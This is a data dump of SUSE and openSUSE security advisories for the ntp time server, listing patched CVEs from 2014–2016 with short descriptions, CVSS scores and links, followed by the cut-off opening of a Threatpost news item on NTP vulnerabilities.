ntpq and ntpdc, disclose origin (bsc#962997).\n - CVE-2015-5300: MITM attacker could have forced ntpd to make a step\n larger than the panic threshold (bsc#951629).\n - CVE-2015-7871: NAK to the Future: Symmetric association authentication\n bypass via crypto-NAK (bsc#951608).\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead of returning\n FAIL on some bogus values (bsc#951608).\n - CVE-2015-7854: Password Length Memory Corruption Vulnerability\n (bsc#951608).\n - CVE-2015-7853: Invalid length data provided by a custom refclock driver\n could cause a buffer overflow (bsc#951608).\n - CVE-2015-7852: ntpq atoascii() Memory Corruption Vulnerability\n (bsc#951608).\n - CVE-2015-7851: saveconfig Directory Traversal Vulnerability (bsc#951608).\n - CVE-2015-7850: remote config logfile-keyfile (bsc#951608).\n - CVE-2015-7849: trusted key use-after-free (bsc#951608).\n - CVE-2015-7848: mode 7 loop counter underrun (bsc#951608).\n - CVE-2015-7701: Slow memory leak in CRYPTO_ASSOC (bsc#951608).\n - CVE-2015-7703: configuration directives "pidfile" and "driftfile" should\n only be allowed locally (bsc#951608).\n - CVE-2015-7704, CVE-2015-7705: Clients that receive a KoD should validate\n the origin timestamp field (bsc#951608).\n - CVE-2015-7691, CVE-2015-7692, CVE-2015-7702: Incomplete autokey data\n packet length checks (bsc#951608).\n\n These non-security issues were fixed:\n - fate#320758 bsc#975981: Enable compile-time support for MS-SNTP\n (--enable-ntp-signd). This replaces the w32 patches in 4.2.4 that added\n the authreg directive.\n - bsc#962318: Call /usr/sbin/sntp with full path to synchronize in\n start-ntpd. When run as cron job, /usr/sbin/ is not in the path, which\n caused the synchronization to fail.\n - bsc#782060: Speedup ntpq.\n - bsc#916617: Add /var/db/ntp-kod.\n - bsc#956773: Add ntp-ENOBUFS.patch to limit a warning that might happen\n quite a lot on loaded systems.\n - bsc#951559,bsc#975496: Fix the TZ offset output of sntp during DST.\n - Add ntp-fork.patch and build with threads disabled to allow name\n resolution even when running chrooted.\n - Add a controlkey line to /etc/ntp.conf if one does not already exist to\n allow runtime configuuration via ntpq.\n - bsc#946386: Temporarily disable memlock to avoid problems due to high\n memory usage during name resolution.\n - bsc#905885: Use SHA1 instead of MD5 for symmetric keys.\n - Improve runtime configuration:\n * Read keytype from ntp.conf\n * Don't write ntp keys to syslog.\n - Fix legacy action scripts to pass on command line arguments.\n - bsc#944300: Remove "kod" from the restrict line in ntp.conf.\n - bsc#936327: Use ntpq instead of deprecated ntpdc in start-ntpd.\n - Add a controlkey to ntp.conf to make the above work.\n - Don't let "keysdir" lines in ntp.conf trigger the "keys" parser.\n - Disable mode 7 (ntpdc) again, now that we don't use it anymore.\n - Add "addserver" as a new legacy action.\n - bsc#910063: Fix the comment regarding addserver in ntp.conf.\n - bsc#926510: Disable chroot by default.\n - bsc#920238: Enable ntpdc for backwards compatibility.\n\n", "edition": 1, "modified": "2016-05-06T13:07:50", "published": "2016-05-06T13:07:50", "id": "SUSE-SU-2016:1247-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00020.html", "title": "Security update for ntp (important)", "type": "suse", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7703", "CVE-2015-8140", "CVE-2015-8138", "CVE-2015-7855", "CVE-2015-7973", "CVE-2015-7977", "CVE-2015-8158", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7979", "CVE-2015-7701", "CVE-2015-7976", "CVE-2015-7848", "CVE-2015-8139", "CVE-2015-7975", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-7974", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7978", "CVE-2015-7853"], "description": "This network time protocol server ntp was updated to 4.2.8p6 to fix the\n following issues:\n\n Also yast2-ntp-client was updated to match some sntp syntax changes.\n (bsc#937837)\n\n Major functional changes:\n - The "sntp" commandline tool changed its option handling in a major way.\n - "controlkey 1" is added during update to ntp.conf to allow sntp to work.\n - The local clock is being disabled during update.\n - ntpd is no longer running chrooted.\n\n\n Other functional changes:\n - ntp-signd is installed.\n - "enable mode7" can be added to the configuration to allow ntdpc to work\n as compatibility mode option.\n - "kod" was removed from the default restrictions.\n - SHA1 keys are used by default instead of MD5 keys.\n\n These security issues were fixed:\n - CVE-2015-5219: An endless loop due to incorrect precision to double\n conversion (bsc#943216).\n - CVE-2015-8158: Fixed potential infinite loop in ntpq (bsc#962966).\n - CVE-2015-8138: Zero Origin Timestamp Bypass (bsc#963002).\n - CVE-2015-7979: Off-path Denial of Service (DoS) attack on authenticated\n broadcast mode (bsc#962784).\n - CVE-2015-7978: Stack exhaustion in recursive traversal of restriction\n list (bsc#963000).\n - CVE-2015-7977: reslist NULL pointer dereference (bsc#962970).\n - CVE-2015-7976: ntpq saveconfig command allows dangerous characters in\n filenames (bsc#962802).\n - CVE-2015-7975: nextvar() missing length check (bsc#962988).\n - CVE-2015-7974: Skeleton Key: Missing key check allows impersonation\n between authenticated peers (bsc#962960).\n - CVE-2015-7973: Replay attack on authenticated broadcast mode\n (bsc#962995).\n - CVE-2015-8140: ntpq vulnerable to replay attacks (bsc#962994).\n - CVE-2015-8139: Origin Leak: ntpq and ntpdc, disclose origin (bsc#962997).\n - CVE-2015-5300: MITM attacker could have forced ntpd to make a step\n larger than the panic threshold (bsc#951629).\n - CVE-2015-7871: NAK to the Future: Symmetric association authentication\n bypass via crypto-NAK (bsc#951608).\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead of returning\n FAIL on some bogus values (bsc#951608).\n - CVE-2015-7854: Password Length Memory Corruption Vulnerability\n (bsc#951608).\n - CVE-2015-7853: Invalid length data provided by a custom refclock driver\n could cause a buffer overflow (bsc#951608).\n - CVE-2015-7852: ntpq atoascii() Memory Corruption Vulnerability\n (bsc#951608).\n - CVE-2015-7851: saveconfig Directory Traversal Vulnerability (bsc#951608).\n - CVE-2015-7850: remote config logfile-keyfile (bsc#951608).\n - CVE-2015-7849: trusted key use-after-free (bsc#951608).\n - CVE-2015-7848: mode 7 loop counter underrun (bsc#951608).\n - CVE-2015-7701: Slow memory leak in CRYPTO_ASSOC (bsc#951608).\n - CVE-2015-7703: configuration directives "pidfile" and "driftfile" should\n only be allowed locally (bsc#951608).\n - CVE-2015-7704, CVE-2015-7705: Clients that receive a KoD should validate\n the origin timestamp field (bsc#951608).\n - CVE-2015-7691, CVE-2015-7692, CVE-2015-7702: Incomplete autokey data\n packet length checks (bsc#951608).\n\n These non-security issues were fixed:\n - fate#320758 bsc#975981: Enable compile-time support for MS-SNTP\n (--enable-ntp-signd). This replaces the w32 patches in 4.2.4 that added\n the authreg directive.\n - bsc#962318: Call /usr/sbin/sntp with full path to synchronize in\n start-ntpd. When run as cron job, /usr/sbin/ is not in the path, which\n caused the synchronization to fail.\n - bsc#782060: Speedup ntpq.\n - bsc#916617: Add /var/db/ntp-kod.\n - bsc#956773: Add ntp-ENOBUFS.patch to limit a warning that might happen\n quite a lot on loaded systems.\n - bsc#951559,bsc#975496: Fix the TZ offset output of sntp during DST.\n - Add ntp-fork.patch and build with threads disabled to allow name\n resolution even when running chrooted.\n - Add a controlkey line to /etc/ntp.conf if one does not already exist to\n allow runtime configuuration via ntpq.\n - bsc#946386: Temporarily disable memlock to avoid problems due to high\n memory usage during name resolution.\n - bsc#905885: Use SHA1 instead of MD5 for symmetric keys.\n - Improve runtime configuration:\n * Read keytype from ntp.conf\n * Don't write ntp keys to syslog.\n - Fix legacy action scripts to pass on command line arguments.\n - bsc#944300: Remove "kod" from the restrict line in ntp.conf.\n - bsc#936327: Use ntpq instead of deprecated ntpdc in start-ntpd.\n - Don't let "keysdir" lines in ntp.conf trigger the "keys" parser.\n - Disable mode 7 (ntpdc) again, now that we don't use it anymore.\n - Add "addserver" as a new legacy action.\n - bsc#910063: Fix the comment regarding addserver in ntp.conf.\n - bsc#926510: Disable chroot by default.\n - bsc#920238: Enable ntpdc for backwards compatibility.\n - bsc#784760: Remove local clock from default configuration.\n - bsc#942441/fate#319496: Require perl-Socket6.\n - Improve runtime configuration:\n * Read keytype from ntp.conf\n * Don't write ntp keys to syslog.\n - bsc#920183: Allow -4 and -6 address qualifiers in "server" directives.\n - Use upstream ntp-wait, because our version is incompatible with the new\n ntpq command line syntax.\n\n", "edition": 1, "modified": "2016-05-17T15:09:17", "published": "2016-05-17T15:09:17", "id": "SUSE-SU-2016:1311-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00048.html", "type": "suse", "title": "Security update for ntp (important)", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:05:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9296", "CVE-2014-9295"], "description": "The network timeservice ntp was updated to fix critical security issues\n (bnc#910764, CERT VU#852879)\n * A potential remote code execution problem was found inside ntpd. The\n functions crypto_recv() (when using autokey authentication),\n ctl_putdata(), and configure() where updated to avoid buffer overflows\n that could be exploited. (CVE-2014-9295)\n * Furthermore a problem inside the ntpd error handling was found that is\n missing a return statement. This could also lead to a potentially attack\n vector. (CVE-2014-9296)\n\n", "edition": 1, "modified": "2014-12-20T00:04:42", "published": "2014-12-20T00:04:42", "id": "OPENSUSE-SU-2014:1670-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00020.html", "title": "Security update for ntp (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9296", "CVE-2014-9295"], "description": "The network timeservice ntp was updated to fix critical security issues\n (bnc#910764, CERT VU#852879)\n\n * A potential remote code execution problem was found inside ntpd. The\n functions crypto_recv() (when using autokey authentication),\n ctl_putdata(), and configure() where updated to avoid buffer overflows\n that could be exploited. (CVE-2014-9295)\n * Furthermore a problem inside the ntpd error handling was found that is\n missing a return statement. This could also lead to a potentially attack\n vector. (CVE-2014-9296)\n\n", "edition": 1, "modified": "2014-12-23T18:05:02", "published": "2014-12-23T18:05:02", "id": "SUSE-SU-2014:1690-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00026.html", "type": "suse", "title": "Security update for ntp (critical)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:37", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9296", "CVE-2014-9295"], "description": "The network timeservice ntp was updated to fix critical security issues\n (bnc#910764, CERT VU#852879)\n * A potential remote code execution problem was found inside ntpd. The\n functions crypto_recv() (when using autokey authentication),\n ctl_putdata(), and configure() where updated to avoid buffer overflows\n that could be exploited. (CVE-2014-9295)\n * Furthermore a problem inside the ntpd error handling was found that is\n missing a return statement. This could also lead to a potentially attack\n vector. (CVE-2014-9296)\n\n", "edition": 1, "modified": "2014-12-22T12:04:40", "published": "2014-12-22T12:04:40", "id": "OPENSUSE-SU-2014:1680-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00024.html", "type": "suse", "title": "Security update for ntp (critical)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1548", "CVE-2016-2518", "CVE-2015-7703", "CVE-2016-4956", "CVE-2016-4955", "CVE-2015-8138", "CVE-2015-7855", "CVE-2016-4953", "CVE-2015-7973", "CVE-2015-1799", "CVE-2015-7977", "CVE-2016-1550", "CVE-2015-8158", "CVE-2016-2516", "CVE-2015-7704", "CVE-2016-1551", "CVE-2015-7979", "CVE-2016-4954", "CVE-2015-7701", "CVE-2015-7976", "CVE-2015-7848", "CVE-2015-7975", "CVE-2015-7692", "CVE-2016-1547", "CVE-2015-7851", "CVE-2015-7702", "CVE-2016-4957", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2016-2519", "CVE-2016-2517", "CVE-2015-7705", "CVE-2015-1798", "CVE-2015-5300", "CVE-2015-7974", "CVE-2015-7850", "CVE-2016-1549", "CVE-2015-7854", "CVE-2015-7978", "CVE-2015-7853"], "description": "NTP was updated to version 4.2.8p8 to fix several security issues and to\n ensure the continued maintainability of the package.\n\n These security issues were fixed:\n\n * CVE-2016-4953: Bad authentication demobilized ephemeral associations\n (bsc#982065).\n * CVE-2016-4954: Processing spoofed server packets (bsc#982066).\n * CVE-2016-4955: Autokey association reset (bsc#982067).\n * CVE-2016-4956: Broadcast interleave (bsc#982068).\n * CVE-2016-4957: CRYPTO_NAK crash (bsc#982064).\n * CVE-2016-1547: Validate crypto-NAKs to prevent ACRYPTO-NAK DoS\n (bsc#977459).\n * CVE-2016-1548: Prevent the change of time of an ntpd client or\n denying service to an ntpd client by forcing it to change from basic\n client/server mode to interleaved symmetric mode (bsc#977461).\n * CVE-2016-1549: Sybil vulnerability: ephemeral association attack\n (bsc#977451).\n * CVE-2016-1550: Improve security against buffer comparison timing\n attacks (bsc#977464).\n * CVE-2016-1551: Refclock impersonation vulnerability (bsc#977450)y\n * CVE-2016-2516: Duplicate IPs on unconfig directives could have\n caused an assertion botch in ntpd (bsc#977452).\n * CVE-2016-2517: Remote configuration trustedkey/\n requestkey/controlkey values are not properly validated (bsc#977455).\n * CVE-2016-2518: Crafted addpeer with hmode > 7 causes array\n wraparound with MATCH_ASSOC (bsc#977457).\n * CVE-2016-2519: ctl_getitem() return value not always checked\n (bsc#977458).\n * CVE-2015-8158: Potential Infinite Loop in ntpq (bsc#962966).\n * CVE-2015-8138: Zero Origin Timestamp Bypass (bsc#963002).\n * CVE-2015-7979: Off-path Denial of Service (DoS) attack on\n authenticated broadcast mode (bsc#962784).\n * CVE-2015-7978: Stack exhaustion in recursive traversal of\n restriction list (bsc#963000).\n * CVE-2015-7977: reslist NULL pointer dereference (bsc#962970).\n * CVE-2015-7976: ntpq saveconfig command allowed dangerous characters\n in filenames (bsc#962802).\n * CVE-2015-7975: nextvar() missing length check (bsc#962988).\n * CVE-2015-7974: NTP did not verify peer associations of symmetric\n keys when authenticating packets, which might have allowed remote\n attackers to conduct impersonation attacks via an arbitrary trusted\n key, aka a "skeleton" key (bsc#962960).\n * CVE-2015-7973: Replay attack on authenticated broadcast mode\n (bsc#962995).\n * CVE-2015-5300: MITM attacker can force ntpd to make a step larger\n than the panic threshold (bsc#951629).\n * CVE-2015-5194: Crash with crafted logconfig configuration command\n (bsc#943218).\n * CVE-2015-7871: NAK to the Future: Symmetric association\n authentication bypass via crypto-NAK (bsc#952611).\n * CVE-2015-7855: decodenetnum() will ASSERT botch instead of returning\n FAIL on some bogus values (bsc#952611).\n * CVE-2015-7854: Password Length Memory Corruption Vulnerability\n (bsc#952611).\n * CVE-2015-7853: Invalid length data provided by a custom refclock\n driver could cause a buffer overflow (bsc#952611).\n * CVE-2015-7852: ntpq atoascii() Memory Corruption Vulnerability\n (bsc#952611).\n * CVE-2015-7851: saveconfig Directory Traversal Vulnerability\n (bsc#952611).\n * CVE-2015-7850: Clients that receive a KoD now validate the origin\n timestamp field (bsc#952611).\n * CVE-2015-7849: Prevent use-after-free trusted key (bsc#952611).\n * CVE-2015-7848: Prevent mode 7 loop counter underrun (bsc#952611).\n * CVE-2015-7701: Slow memory leak in CRYPTO_ASSOC (bsc#952611).\n * CVE-2015-7703: Configuration directives "pidfile" and "driftfile"\n should only be allowed locally (bsc#943221).\n * CVE-2015-7704: Clients that receive a KoD should validate the origin\n timestamp field (bsc#952611).\n * CVE-2015-7705: Clients that receive a KoD should validate the origin\n timestamp field (bsc#952611).\n * CVE-2015-7691: Incomplete autokey data packet length checks\n (bsc#952611).\n * CVE-2015-7692: Incomplete autokey data packet length checks\n (bsc#952611).\n * CVE-2015-7702: Incomplete autokey data packet length checks\n (bsc#952611).\n * CVE-2015-1798: The symmetric-key feature in the receive function in\n ntp_proto.c in ntpd in NTP required a correct MAC only if the MAC\n field has a nonzero length, which made it easier for\n man-in-the-middle attackers to spoof packets by omitting the MAC\n (bsc#924202).\n * CVE-2015-1799: The symmetric-key feature in the receive function in\n ntp_proto.c in ntpd in NTP performed state-variable updates upon\n receiving certain invalid packets, which made it easier for\n man-in-the-middle attackers to cause a denial of service\n (synchronization loss) by spoofing the source IP address of a peer\n (bsc#924202).\n\n These non-security issues were fixed:\n\n * Keep the parent process alive until the daemon has finished\n initialisation, to make sure that the PID file exists when the\n parent returns.\n * bsc#979302: Change the process name of the forking DNS worker\n process to avoid the impression that ntpd is started twice.\n * bsc#981422: Don't ignore SIGCHILD because it breaks wait().\n * Separate the creation of ntp.keys and key #1 in it to avoid problems\n when upgrading installations that have the file, but no key #1,\n which is needed e.g. by "rcntp addserver".\n * bsc#957226: Restrict the parser in the startup script to the first\n occurrance of "keys" and "controlkey" in ntp.conf.\n * Enable compile-time support for MS-SNTP (--enable-ntp-signd)\n * bsc#975496: Fix ntp-sntp-dst.patch.\n * bsc#962318: Call /usr/sbin/sntp with full path to synchronize in\n start-ntpd. When run as cron job, /usr/sbin/ is not in the path,\n which caused the synchronization to fail.\n * bsc#782060: Speedup ntpq.\n * bsc#951559: Fix the TZ offset output of sntp during DST.\n * bsc#916617: Add /var/db/ntp-kod.\n * bsc#951351: Add ntp-ENOBUFS.patch to limit a warning that might\n happen quite a lot on loaded systems.\n * Add ntp-fork.patch and build with threads disabled to allow name\n resolution even when running chrooted.\n * bnc#784760: Remove local clock from default configuration.\n * Fix incomplete backporting of "rcntp ntptimemset".\n * bsc#936327: Use ntpq instead of deprecated ntpdc in start-ntpd.\n * Don't let "keysdir" lines in ntp.conf trigger the "keys" parser.\n * bsc#910063: Fix the comment regarding addserver in ntp.conf.\n * bsc#944300: Remove "kod" from the restrict line in ntp.conf.\n * bsc#905885: Use SHA1 instead of MD5 for symmetric keys.\n * bsc#926510: Re-add chroot support, but mark it as deprecated and\n disable it by default.\n * bsc#920895: Drop support for running chrooted, because it is an\n ongoing source of problems and not really needed anymore, given that\n ntp now drops privileges and runs under apparmor.\n * bsc#920183: Allow -4 and -6 address qualifiers in "server"\n directives.\n * Use upstream ntp-wait, because our version is incompatible with the\n new ntpq command line syntax.\n * bsc#920905: Adjust Util.pm to the Perl version on SLE11.\n * bsc#920238: Enable ntpdc for backwards compatibility.\n * bsc#920893: Don't use %exclude.\n * bsc#988417: Default to NTPD_FORCE_SYNC_ON_STARTUP="yes"\n * bsc#988565: Ignore errors when removing extra files during\n uninstallation\n * bsc#988558: Don't blindly guess the value to use for IP_TOS\n\n Security Issues:\n\n * CVE-2016-4953\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4953\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4953</a>>\n * CVE-2016-4954\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4954\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4954</a>>\n * CVE-2016-4955\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4955\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4955</a>>\n * CVE-2016-4956\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4956\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4956</a>>\n * CVE-2016-4957\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4957\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4957</a>>\n * CVE-2016-1547\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547</a>>\n * CVE-2016-1548\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548</a>>\n * CVE-2016-1549\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549</a>>\n * CVE-2016-1550\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550</a>>\n * CVE-2016-1551\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551</a>>\n * CVE-2016-2516\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516</a>>\n * CVE-2016-2517\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517</a>>\n * CVE-2016-2518\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518</a>>\n * CVE-2016-2519\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519</a>>\n * CVE-2015-8158\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8158\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8158</a>>\n * CVE-2015-8138\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138</a>>\n * CVE-2015-7979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7979</a>>\n * CVE-2015-7978\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7978\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7978</a>>\n * CVE-2015-7977\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7977\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7977</a>>\n * CVE-2015-7976\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7976\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7976</a>>\n * CVE-2015-7975\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7975\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7975</a>>\n * CVE-2015-7974\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7974\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7974</a>>\n * CVE-2015-7973\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7973\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7973</a>>\n * CVE-2015-5300\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5300\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5300</a>>\n * CVE-2015-5194\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5194\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5194</a>>\n * CVE-2015-7871\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871</a>>\n * CVE-2015-7855\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855</a>>\n * CVE-2015-7854\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854</a>>\n * CVE-2015-7853\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853</a>>\n * CVE-2015-7852\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852</a>>\n * CVE-2015-7851\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851</a>>\n * CVE-2015-7850\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850</a>>\n * CVE-2015-7849\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849</a>>\n * CVE-2015-7848\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848</a>>\n * CVE-2015-7701\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701</a>>\n * CVE-2015-7703\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703</a>>\n * CVE-2015-7704\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704</a>>\n * CVE-2015-7705\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705</a>>\n * CVE-2015-7691\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691</a>>\n * CVE-2015-7692\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692</a>>\n * CVE-2015-7702\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702</a>>\n * CVE-2015-1798\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798</a>>\n * CVE-2015-1799\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799</a>>\n\n\n", "edition": 1, "modified": "2016-07-29T19:08:48", "published": "2016-07-29T19:08:48", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00026.html", "id": "SUSE-SU-2016:1912-1", "title": "Security update for ntp (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:04", "bulletinFamily": "info", "cvelist": ["CVE-2015-1798"], "description": "NTP, the much maligned protocol abused in a number of [high volume DDoS attacks](<https://threatpost.com/volume-of-ntp-amplification-attacks-getting-louder/105763>) a year ago, is suffering from newly patched vulnerabilities that could allow an attacker to send unauthenticated packets to a client that would be executed.\n\nThe Department of Homeland Security and CERT at the Software Engineering Institute at Carnegie Mellon University on Tuesday issued an [advisory](<http://www.kb.cert.org/vuls/id/374268>) warning of the [two vulnerabilities](<http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities>), which were patched in [ntp-4.2 